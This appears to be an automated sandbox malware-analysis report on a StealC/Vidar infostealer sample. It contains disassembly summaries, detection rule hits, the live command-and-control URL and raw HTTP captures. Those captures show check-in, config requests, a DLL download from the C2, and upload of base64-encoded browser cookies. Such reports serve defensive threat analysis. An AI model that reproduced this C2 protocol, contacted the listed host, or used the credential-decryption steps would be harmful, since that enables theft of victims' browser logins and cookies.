API String ID: 1385522511-4285296124
Opcode ID: 42694a82d50419593543014ed639d3c0b7b0a1cc9e8c081b0c966009efa554e6
Instruction ID: ade83d353ae3e90e414ea3607e1a668b33cc9a044b411937371976f19cbe3d0c
Opcode Fuzzy Hash: 42694a82d50419593543014ed639d3c0b7b0a1cc9e8c081b0c966009efa554e6
Instruction Fuzzy Hash: D4F04FB1700645CBDB009F1AD88579033F1E74772EF244A15D5440BB51D735B65ACA9F

Function 6C656C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0Khl,?,6C684B30,80000000,?,6C684AB7,?,6C6443CF,?,6C6442D2), ref: 6C656C42

Part of subcall function 6C65CA10: malloc.MOZGLUE(?), ref: 6C65CA26

moz_xmalloc.MOZGLUE(0Khl,?,6C684B30,80000000,?,6C684AB7,?,6C6443CF,?,6C6442D2), ref: 6C656C58

Strings

0Khl, xrefs: 6C656C33, 6C656C41, 6C656C57

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: moz_xmalloc$malloc
String ID: 0Khl
API String ID: 1967447596-1149274432
Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction ID: 4ddf5283f411f889b3a2b5c6c4fc26b38d7d96a10c2ba9fa39be4112fd7d33d5
Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction Fuzzy Hash: D9E026F1A101001A9B08987C9C0996A75C88B193AA7A44A35E823C2BC8FB94E470C15D

Function 6C65BED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON

Download Yara Rule

APIs

DisableThreadLibraryCalls.KERNEL32(?), ref: 6C65BEE3
LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C65BEF5

Strings

cryptbase.dll, xrefs: 6C65BEF0

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: Library$CallsDisableLoadThread
String ID: cryptbase.dll
API String ID: 4137859361-1262567842
Opcode ID: 1d7efd94bd484cd63821bea375eaadae036c0fe0a4f8ceecd6a3c48f321ad9dd
Instruction ID: 367d6406653ee506e8fb815757fd5eaa7627cbb12ae6ed8efc78c148cb5c0f58
Opcode Fuzzy Hash: 1d7efd94bd484cd63821bea375eaadae036c0fe0a4f8ceecd6a3c48f321ad9dd
Instruction Fuzzy Hash: CBD0A731384208EBC700AA518C09B2937749785795F60C020F30544851C7B09522CF4D

Function 6C69B5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C69B2C9,?,?,?,6C69B127,?,?,?,?,?,?,?,?,?,6C69AE52), ref: 6C69B628

Part of subcall function 6C6990E0: free.MOZGLUE(?,00000000,?,?,6C69DEDB), ref: 6C6990FF
Part of subcall function 6C6990E0: free.MOZGLUE(?,00000000,?,?,6C69DEDB), ref: 6C699108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C69B2C9,?,?,?,6C69B127,?,?,?,?,?,?,?,?,?,6C69AE52), ref: 6C69B67D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C69B2C9,?,?,?,6C69B127,?,?,?,?,?,?,?,?,?,6C69AE52), ref: 6C69B708
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C69B127,?,?,?,?,?,?,?,?), ref: 6C69B74D

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: b3b9cbfc2a47ed6e39ea7d2c2c04f4a41759893a74f10b404b4929208261169e
Instruction ID: 745a7207a98e489b085f30078d5c027463f12024debc2cde6ef323bdac06fa4c
Opcode Fuzzy Hash: b3b9cbfc2a47ed6e39ea7d2c2c04f4a41759893a74f10b404b4929208261169e
Instruction Fuzzy Hash: 3E51CE71A05216CFDB24CF58C9806AEB7B5FFC5708F55862DC85AAB700D731A904CBA9

Function 6C696E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C696EAB
memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C696EFA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C696F1E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C696F5C

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 1690337ae5d60a150696c4f15a1ce2aa47236d606047fa87a2b849e2ac380d59
Instruction ID: 6b7fced44f0cfb1037c7db65bc79132b4f65ce24aeefa2edf59331c47a151205
Opcode Fuzzy Hash: 1690337ae5d60a150696c4f15a1ce2aa47236d606047fa87a2b849e2ac380d59
Instruction Fuzzy Hash: 5231C371A1060B8FDB44CF2CC9806AA73FAEB85344F508639D41BD7651EB32E659C7E4

Function 6C6AB580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C650A4D), ref: 6C6AB5EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C650A4D), ref: 6C6AB623
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C650A4D), ref: 6C6AB66C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C650A4D), ref: 6C6AB67F

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: e275126af61f0abe232575c1fae10b73198cc26da7227e15674ebc2f2adf0f7e
Instruction ID: 459feaea3ffc1d3be6db16d73ee34a6f8e856242b5729f0a438e7d748e54214c
Opcode Fuzzy Hash: e275126af61f0abe232575c1fae10b73198cc26da7227e15674ebc2f2adf0f7e
Instruction Fuzzy Hash: 4331C871A012198FDB10CF99C88465AB7F5FFC1314F168569C8069B711DB31ED16CBE5

Function 6C67F5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00010000), ref: 6C67F611
memcpy.VCRUNTIME140(?,?,?), ref: 6C67F623
memcpy.VCRUNTIME140(?,?,00010000), ref: 6C67F652
memcpy.VCRUNTIME140(?,?,?), ref: 6C67F668

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction ID: 69150ccdfaacd19e952436e4249937dba37d11524efd04253a753f2a6ef859f1
Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction Fuzzy Hash: FF315171A00214AFD724CF6DCCC0E9F77B5EF94354B148939FA4A8BB04D632E9548BA9

Function 6C6926B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6926C1
free.MOZGLUE(?), ref: 6C6926E4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6926FF
free.MOZGLUE ref: 6C69270D

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 7095a6a24c13e5d82e8e5df00e0bfd2253a47e69bedc3e8338f263558c12ccb8
Instruction ID: 31cabd9c8ab14e1c33af7758758150b048ed01dc7881d84318a2e97879f9b023
Opcode Fuzzy Hash: 7095a6a24c13e5d82e8e5df00e0bfd2253a47e69bedc3e8338f263558c12ccb8
Instruction Fuzzy Hash: E6F0A9B27012026BEB009A19DCC495773A9FF5135CB540035EA16D7F02E732F959C69E

Source: http://185.215.113.37/	URL Reputation: Label: malware
Source: http://185.215.113.37	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	URL Reputation: Label: malware

Source: 0.2.file.exe.340000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: 0.2.file.exe.340000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00349B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00349B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034C820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_0034C820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00347240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00347240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00349AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00349AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00358EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00358EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C656C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C656C80

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49704 -> 185.215.113.37:80

Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIDAFBFBKFHJJKEHIEGHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 30 34 46 46 30 36 35 32 45 30 36 31 34 33 37 37 38 38 36 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 2d 2d 0d 0a Data Ascii: ------KFIDAFBFBKFHJJKEHIEGContent-Disposition: form-data; name="hwid"B04FF0652E061437788654------KFIDAFBFBKFHJJKEHIEGContent-Disposition: form-data; name="build"doma------KFIDAFBFBKFHJJKEHIEG--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHIJKKFHIEGCBGCAFIJHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 33 36 35 36 62 31 66 64 32 38 62 63 61 39 39 37 37 64 37 35 37 36 61 61 33 65 64 34 36 36 37 39 61 32 36 33 32 63 34 65 32 61 63 38 34 32 30 32 61 36 61 63 62 65 61 31 37 36 33 65 30 34 65 32 35 34 35 65 35 36 38 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 2d 2d 0d 0a Data Ascii: ------AEHIJKKFHIEGCBGCAFIJContent-Disposition: form-data; name="token"f3656b1fd28bca9977d7576aa3ed46679a2632c4e2ac84202a6acbea1763e04e2545e568------AEHIJKKFHIEGCBGCAFIJContent-Disposition: form-data; name="message"browsers------AEHIJKKFHIEGCBGCAFIJ--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAEHDHIIJKECBKEBAHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 33 36 35 36 62 31 66 64 32 38 62 63 61 39 39 37 37 64 37 35 37 36 61 61 33 65 64 34 36 36 37 39 61 32 36 33 32 63 34 65 32 61 63 38 34 32 30 32 61 36 61 63 62 65 61 31 37 36 33 65 30 34 65 32 35 34 35 65 35 36 38 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 2d 2d 0d 0a Data Ascii: ------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="token"f3656b1fd28bca9977d7576aa3ed46679a2632c4e2ac84202a6acbea1763e04e2545e568------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="message"plugins------BGDAAEHDHIIJKECBKEBA--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBGIJEHIIDGCFHIEGDGCHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 47 49 4a 45 48 49 49 44 47 43 46 48 49 45 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 33 36 35 36 62 31 66 64 32 38 62 63 61 39 39 37 37 64 37 35 37 36 61 61 33 65 64 34 36 36 37 39 61 32 36 33 32 63 34 65 32 61 63 38 34 32 30 32 61 36 61 63 62 65 61 31 37 36 33 65 30 34 65 32 35 34 35 65 35 36 38 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 49 4a 45 48 49 49 44 47 43 46 48 49 45 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 49 4a 45 48 49 49 44 47 43 46 48 49 45 47 44 47 43 2d 2d 0d 0a Data Ascii: ------DBGIJEHIIDGCFHIEGDGCContent-Disposition: form-data; name="token"f3656b1fd28bca9977d7576aa3ed46679a2632c4e2ac84202a6acbea1763e04e2545e568------DBGIJEHIIDGCFHIEGDGCContent-Disposition: form-data; name="message"fplugins------DBGIJEHIIDGCFHIEGDGC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFBFCAFCBKFIEBFHIDBAHost: 185.215.113.37Content-Length: 7035Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKKKJJJKJKFHJJJJECBHost: 185.215.113.37Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 33 36 35 36 62 31 66 64 32 38 62 63 61 39 39 37 37 64 37 35 37 36 61 61 33 65 64 34 36 36 37 39 61 32 36 33 32 63 34 65 32 61 63 38 34 32 30 32 61 36 61 63 62 65 61 31 37 36 33 65 30 34 65 32 35 34 35 65 35 36 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 2d 2d 0d 0a Data Ascii: ------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="token"f3656b1fd28bca9977d7576aa3ed46679a2632c4e2ac84202a6acbea1763e04e2545e568------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Y
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCFBGDHJKFIEBFIECGHHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 33 36 35 36 62 31 66 64 32 38 62 63 61 39 39 37 37 64 37 35 37 36 61 61 33 65 64 34 36 36 37 39 61 32 36 33 32 63 34 65 32 61 63 38 34 32 30 32 61 36 61 63 62 65 61 31 37 36 33 65 30 34 65 32 35 34 35 65 35 36 38 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 2d 2d 0d 0a Data Ascii: ------BGCFBGDHJKFIEBFIECGHContent-Disposition: form-data; 